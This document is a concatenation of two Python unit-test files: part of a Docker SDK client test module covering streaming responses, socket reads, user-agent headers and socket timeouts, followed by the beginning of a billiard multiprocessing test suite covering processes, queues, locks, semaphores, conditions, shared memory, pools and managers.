@pytest.mark.skipif(
docker.constants.IS_WINDOWS_PLATFORM, reason='Unix only'
)
def test_early_stream_response(self):
self.request_handler = self.early_response_sending_handler
lines = []
for i in range(0, 50):
line = str(i).encode()
lines += [('%x' % len(line)).encode(), line]
lines.append(b'0')
lines.append(b'')
self.response = (
b'HTTP/1.1 200 OK\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n'
) + b'\r\n'.join(lines)
with APIClient(base_url="http+unix://" + self.socket_file) as client:
for i in range(5):
try:
stream = client.build(
path=self.build_context,
)
break
except requests.ConnectionError as e:
if i == 4:
raise e
assert list(stream) == [
str(i).encode() for i in range(50)
]
class TCPSocketStreamTest(unittest.TestCase):
text_data = b'''
Now, those children out there, they're jumping through the
flames in the hope that the god of the fire will make them fruitful.
Really, you can't blame them. After all, what girl would not prefer the
child of a god to that of some acne-scarred artisan?
'''
def setUp(self):
self.server = six.moves.socketserver.ThreadingTCPServer(
('', 0), self.get_handler_class()
)
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.setDaemon(True)
self.thread.start()
self.address = 'http://{}:{}'.format(
socket.gethostname(), self.server.server_address[1]
)
def tearDown(self):
self.server.shutdown()
self.server.server_close()
self.thread.join()
def get_handler_class(self):
text_data = self.text_data
class Handler(six.moves.BaseHTTPServer.BaseHTTPRequestHandler, object):
def do_POST(self):
self.send_response(101)
self.send_header(
'Content-Type', 'application/vnd.docker.raw-stream'
)
self.send_header('Connection', 'Upgrade')
self.send_header('Upgrade', 'tcp')
self.end_headers()
self.wfile.flush()
time.sleep(0.2)
self.wfile.write(text_data)
self.wfile.flush()
return Handler
def test_read_from_socket(self):
with APIClient(base_url=self.address) as client:
resp = client._post(client._url('/dummy'), stream=True)
data = client._read_from_socket(resp, stream=True, tty=True)
results = b''.join(data)
assert results == self.text_data
class UserAgentTest(unittest.TestCase):
def setUp(self):
self.patcher = mock.patch.object(
APIClient,
'send',
return_value=fake_resp("GET", "%s/version" % fake_api.prefix)
)
self.mock_send = self.patcher.start()
def tearDown(self):
self.patcher.stop()
def test_default_user_agent(self):
client = APIClient()
client.version()
assert self.mock_send.call_count == 1
headers = self.mock_send.call_args[0][0].headers
expected = 'docker-sdk-python/%s' % docker.__version__
assert headers['User-Agent'] == expected
def test_custom_user_agent(self):
client = APIClient(user_agent='foo/bar')
client.version()
assert self.mock_send.call_count == 1
headers = self.mock_send.call_args[0][0].headers
assert headers['User-Agent'] == 'foo/bar'
class DisableSocketTest(unittest.TestCase):
class DummySocket(object):
def __init__(self, timeout=60):
self.timeout = timeout
def settimeout(self, timeout):
self.timeout = timeout
def gettimeout(self):
return self.timeout
def setUp(self):
self.client = APIClient()
def test_disable_socket_timeout(self):
"""Test that the timeout is disabled on a generic socket object."""
socket = self.DummySocket()
self.client._disable_socket_timeout(socket)
assert socket.timeout is None
def test_disable_socket_timeout2(self):
"""Test that the timeouts are disabled on a generic socket object
and it's _sock object if present."""
socket = self.DummySocket()
socket._sock = self.DummySocket()
self.client._disable_socket_timeout(socket)
assert socket.timeout is None
assert socket._sock.timeout is None
def test_disable_socket_timout_non_blocking(self):
"""Test that a non-blocking socket does not get set to blocking."""
socket = self.DummySocket()
socket._sock = self.DummySocket(0.0)
self.client._disable_socket_timeout(socket)
assert socket.timeout is None
assert socket._sock.timeout == 0.0
|
test_multiprocessing.py
|
#!/usr/bin/env python
from __future__ import absolute_import
#
# Unit tests for the multiprocessing package
#
import unittest
import Queue
import time
import sys
import os
import gc
import array
import random
import logging
from nose import SkipTest
from test import test_support
from StringIO import StringIO
try:
from billiard._ext import _billiard
except ImportError as exc:
raise SkipTest(exc)
# import threading after _billiard to raise a more revelant error
# message: "No module named _billiard". _billiard is not compiled
# without thread support.
import threading
# Work around broken sem_open implementations
try:
import billiard.synchronize
except ImportError as exc:
raise SkipTest(exc)
import billiard.dummy
import billiard.connection
import billiard.managers
import billiard.heap
import billiard.pool
from billiard import util
from billiard.compat import bytes
latin = str
# Constants
LOG_LEVEL = util.SUBWARNING
DELTA = 0.1
# making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
CHECK_TIMINGS = False
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_billiard,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
# Some tests require ctypes
try:
from ctypes import Structure, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
try:
from ctypes import Value
except ImportError:
Value = None
try:
from ctypes import copy as ctypes_copy
except ImportError:
ctypes_copy = None
class TimingWrapper(object):
"""Creates a wrapper for a function which records the
time it takes to finish"""
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
class BaseTestCase(object):
"""Base class for test cases"""
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
def get_value(self):
"""Return the value of a semaphore"""
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
class _TestProcesses(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
return
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def _test(self, q, *args, **kwds):
current = self.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if self.TYPE != 'threads':
q.put(bytes(current.authkey, 'ascii'))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event() # noqa
args = (q, 1, 2)
kwargs = {'hello': 23, 'bye': 2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEquals(p.authkey, current.authkey)
self.assertEquals(p.is_alive(), False)
self.assertEquals(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEquals(p.exitcode, None)
self.assertEquals(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEquals(q.get(), args[1:])
self.assertEquals(q.get(), kwargs)
self.assertEquals(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEquals(q.get(), current.authkey)
self.assertEquals(q.get(), p.pid)
p.join()
self.assertEquals(p.exitcode, 0)
self.assertEquals(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
def _test_terminate(self):
time.sleep(1000)
def test_terminate(self):
if self.TYPE == 'threads':
return
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
p.terminate()
join = TimingWrapper(p.join)
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
# self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = billiard.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
def _test_recursion(self, wconn, id):
__import__('billiard.forking')
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = self.Process(
target=self._test_recursion, args=(wconn, id + [i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
class _UpperCaser(billiard.Process):
def __init__(self):
billiard.Process.__init__(self)
self.child_conn, self.parent_conn = billiard.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
def _test_put(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(Queue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(Queue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
def _test_get(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# ## Hangs unexpectedly, remove for now
# self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(Queue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(Queue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(Queue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
def _test_fork(self, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(Queue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
return
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
def _test_task_done(self, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
if sys.version_info < (2, 5) and not hasattr(queue, 'task_done'):
self.skipTest("requires 'queue.task_done()' method")
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in xrange(4)]
for p in workers:
p.start()
for i in xrange(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# ## Currently fails on OS/X
# if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
return
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
def f(self, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in xrange(6):
sleeping.acquire()
# check they have all timed out
for i in xrange(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in xrange(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
class _TestEvent(BaseTestCase):
def _test_event(self, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporaily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
# self.assertEqual(event.is_set(), False)
self.Process(target=self._test_event, args=(event,)).start()
self.assertEqual(wait(), True)
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def _test(self, values):
for sv, cv in zip(values, self.codes_values):
sv.value = cv[2]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawvalue(self):
self.test_value(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock() # noqa
obj1 = val1.get_obj() # noqa
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock() # noqa
obj2 = val2.get_obj() # noqa
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock() # noqa
obj3 = val3.get_obj() # noqa
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def f(self, seq):
for i in range(1, len(seq)):
seq[i] += seq[i - 1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', range(10))
lock1 = arr1.get_lock() # noqa
obj1 = arr1.get_obj() # noqa
arr2 = self.Array('i', range(10), lock=None)
lock2 = arr2.get_lock() # noqa
obj2 = arr2.get_obj() # noqa
lock = self.Lock()
arr3 = self.Array('i', range(10), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj() # noqa
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(range(10))
self.assertEqual(a[:], range(10))
b = self.list()
self.assertEqual(b[:], [])
b.extend(range(5))
self.assertEqual(b[:], range(5))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2, 3, 4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], range(10))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
indices = range(65, 70)
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((j, chr(j)) for j in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(z) for z in indices])
self.assertEqual(sorted(d.items()), [(x, chr(x)) for x in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
def sqr(x, wait=0.0):
time.sleep(wait)
return x * x
class _TestPool(BaseTestCase):
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x': 3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, range(10)), map(sqr, range(10)))
self.assertEqual(pmap(sqr, range(100), chunksize=20),
map(sqr, range(100)))
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except billiard.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 0.2))
get = TimingWrapper(res.get)
self.assertRaises(billiard.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, range(10))
self.assertEqual(list(it), map(sqr, range(10)))
it = self.pool.imap(sqr, range(10))
for i in range(10):
self.assertEqual(it.next(), i * i)
self.assertRaises(StopIteration, it.next)
it = self.pool.imap(sqr, range(1000), chunksize=100)
for i in range(1000):
self.assertEqual(it.next(), i * i)
self.assertRaises(StopIteration, it.next)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, range(1000))
self.assertEqual(sorted(it), map(sqr, range(1000)))
it = self.pool.imap_unordered(sqr, range(1000), chunksize=53)
self.assertEqual(sorted(it), map(sqr, range(1000)))
def test_make_pool(self):
p = billiard.Pool(3)
self.assertEqual(3, len(p._pool))
p.close()
p.join()
def test_terminate(self):
if self.TYPE == 'manager':
# On Unix a forked process increfs each shared object to
# which its parent process held a reference. If the
# forked process gets terminated then there is likely to
# be a reference leak. So to prevent
# _TestZZZNumberOfObjects from failing we skip this test
# when using a manager.
return
self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
self.assertTrue(join.elapsed < 0.2)
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = billiard.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
countdown = 5
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [worker.pid for worker in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
class _TestZZZNumberOfObjects(BaseTestCase):
# Test that manager has expected number of shared objects left
# Because test cases are sorted alphabetically, this one will get
# run after all the other tests for the manager. It tests that
# there have been no "reference leaks" for the manager's shared
# objects. Note the comment in _TestPool.test_terminate().
ALLOWED_TYPES = ('manager',)
def test_number_of_objects(self):
EXPECTED_NUMBER = 1 # the pool object is still alive
billiard.active_children() # discard dead process objs
gc.collect() # do garbage collection
refs = self.manager._number_of_objects()
debug_info = self.manager._debug_info()
if refs != EXPECTED_NUMBER:
print(self.manager._debug_info())
print(debug_info)
self.assertEqual(refs, EXPECTED_NUMBER)
# Test of creating a customized manager class
from billiard.managers import BaseManager, BaseProxy, RemoteError # noqa
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in xrange(10):
yield i * i
class IteratorProxy(BaseProxy):
_exposed_ = ('next', '__next__')
def __iter__(self):
return self
def next(self):
return self._callmethod('next')
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
